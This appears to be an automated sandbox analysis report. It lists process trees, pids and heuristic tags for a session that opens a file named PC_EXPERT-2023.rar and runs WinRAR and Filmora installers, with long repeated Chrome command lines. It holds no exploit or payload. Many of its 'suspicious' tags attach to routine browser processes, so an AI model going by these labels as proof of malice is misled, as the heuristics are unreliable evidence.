- pid process: 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe
Suspicious use of SetWindowsHookEx 64 IoCs
Processes: OpenWith.exe, winrar-x64-620.exe, WinRAR.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe, filmora_setup_full846.exe, filmora_64bit_full846.exe, filmora_64bit_full846.tmp, _setup64.tmp, Wondershare Helper Compact.exe, Wondershare Helper Compact.tmp, WSHelper.exe, vcredist_x64.exe, install.exe, Wondershare NativePush.exe, Wondershare NativePush.tmp
- pid process: 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3988 OpenWith.exe, 3044 winrar-x64-620.exe, 3044 winrar-x64-620.exe, 3736 WinRAR.exe, 3736 WinRAR.exe, 3064 MicrosoftEdge.exe, 400 MicrosoftEdgeCP.exe, 400 MicrosoftEdgeCP.exe, 5356 MicrosoftEdgeCP.exe, 5340 MicrosoftEdge.exe, 5132 MicrosoftEdgeCP.exe, 5132 MicrosoftEdgeCP.exe, 4684 filmora_setup_full846.exe, 4684 filmora_setup_full846.exe, 4684 filmora_setup_full846.exe, 4816 filmora_64bit_full846.exe, 5912 filmora_64bit_full846.tmp, 4544 _setup64.tmp, 580 Wondershare Helper Compact.exe, 3844 Wondershare Helper Compact.tmp, 4560 WSHelper.exe, 4560 WSHelper.exe, 4156 vcredist_x64.exe, 5528 install.exe, 3620 Wondershare NativePush.exe, 1928 Wondershare NativePush.tmp, 4068 _setup64.tmp
Suspicious use of WriteProcessMemory 64 IoCs
Processes: chrome.exe
- description pid process target process: PID 4248 wrote to memory of 4036 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4036 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4300 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 4300 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe, PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe
Processes
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\PC_EXPERT-2023.rar
- C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in Program Files directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9c4774f50,0x7ff9c4774f60,0x7ff9c4774f70
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1768 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:2
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2328 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3764 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4364 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4568 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5052 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3140 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5704 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5272 /prefetch:82⤵
-
C:\Users\Admin\Downloads\winrar-x64-620.exe"C:\Users\Admin\Downloads\winrar-x64-620.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinRAR\uninstall.exe"C:\Program Files\WinRAR\uninstall.exe" /setup3⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4832 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9c4774f50,0x7ff9c4774f60,0x7ff9c4774f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1988 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4804 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:12⤵
-
